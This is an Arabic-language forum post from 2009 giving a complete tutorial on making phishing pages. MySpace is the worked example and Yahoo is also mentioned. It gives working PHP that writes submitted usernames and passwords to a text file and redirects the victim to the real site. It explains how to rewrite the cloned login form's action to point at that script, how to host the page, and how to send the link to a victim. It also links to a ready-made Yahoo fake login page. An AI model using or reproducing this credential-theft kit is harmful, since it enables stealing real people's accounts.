عرض مشاركة واحدة
قديم 07-21-2009, 07:36 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
IbN Al3RaQ
Don't Touch Me
 
الصورة الرمزية IbN Al3RaQ
 

 

 
إحصائية العضو





IbN Al3RaQ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
IbN Al3RaQ is on a distinguished road

.... اول درس اقوم بشرحة في مجال صناعة الصفحات المزورة اتمنى يكون مفيد


السلام عليكم ورحمة الله

احبيتي الاعزة

اخوكم صحيح مبتديء بس قريت هالدرس وعجبني اترجمة وانقلة الكم

طبعا بعد نجاح تطبيق الدرس :-

حتى تصنع صفحة مزورة لاي موقع ما يجب ان تمتلك موقع خاص بك على الانترنت وكثيرة هي المواقع

واني لهذا الخصوص انصح بهذا الموقع

www.ripway.com

وراح يصير الشرح عليه.

ثاني خطوة تفتح صفحة الموقع الي تريد تصنع مثلها مزور وتنتبه انه مايكون انتة مسجل دخول بالموقع

يعني معلومات الدخول كيوزر نيم او باسوورد فارغة كان يكون تريد تسوي لمنتدى انتة مسجل بيه اول خطوة تسجل خروج من هالمنتدى وتفتح الصفحة اعتقد واضحة هالنقطة.

وتفتح كود الصفحة اما بالضغط على CTRL-U اذا كان متصفحك فايرفوكس
او كلك يمين بالصفحة وتختار view source في حالة الانترنت اكسبلورر

وتحفظ الكود كملف txt باسم مثلا LOGIN.php

تفتح ملف txt جديد وتسميه phish.php وتضع فيه الكود التالي:-
طبعا الشرح هنا على موقع ماي سبيس الشهير
يعني لماتسوي لموقع ثاني تغير الرابط حسب موقعك وتغير اللازم بالشرحز

كود PHP:
<?php
header
("Location: http://www.myspace.com");
$handle = fopen("passwords.txt", "a");
foreach(
$_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

هسه تسوي بحث بملف الموقع الي خزنته بالضغط طبعا ctrl+f

وتبحث عن الكود التالي او مايشابهه بنسبه كبيره لان هو هذا كود تسجيل الدخول للموقع بهالصيغة يصير:-

كود PHP:

<form action="https://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">

ونستبدلة بالكود الخاص بينة الي يخلي بدل ميدز الباسورد للموقع يجيبه للموقع المزور الي سويناه:
كود PHP:
<form action="phish.php" method="get" id="LoginForm" name="aspnetForm">

اذا ركزتو بالكود راح تلاحظو الاكشن بدل من موقع الماي سبيس راح يصير الاكشن على phish.php الي سويناها ونستطيع تغير الاسماء للملفات بس بشرط نغيرها ايضا بالاكواد الي صنعناها.



اخر خطوة وبعد تغير اللازم

نذهب للموقع الخاص بينه ونصنع صفحتين وطبعا تصميم الصفحتين الي سويناهم اقصد

login.php
and
phish.php

تقوم بارسال صفحة login الى الضحية بعد تسجيله لدخول راح تلاكي ملف جديد انضاف بموقعك اسمه
password.txt
ركز شوية راح تلاكي اليوزر والباسورد


جربت الطريقة على الياهو ونجحت

وهذا كود صفحة الياهو للي يحب جاهز :- في هذه الصفحة المزورة

فقط اعرض الكود كما اخبرتك وانسخه لموقعك

http://h1.ripway.com/freelove/login.php



أتمنى ان اكون قدمت شيء بسيط لخدمتكم

تحياتي



h,g ]vs hr,l favpm td l[hg wkhum hgwtphj hgl.,vm hjlkn d;,k ltd]

التوقيع



^^^^^^^^^^^^^^^^^^^^^^^^

http://www.danasoft.com/sig/198771.jpg


^^^^^^^^^^^^^^^^^^^^^^^^

 

   

رد مع اقتباس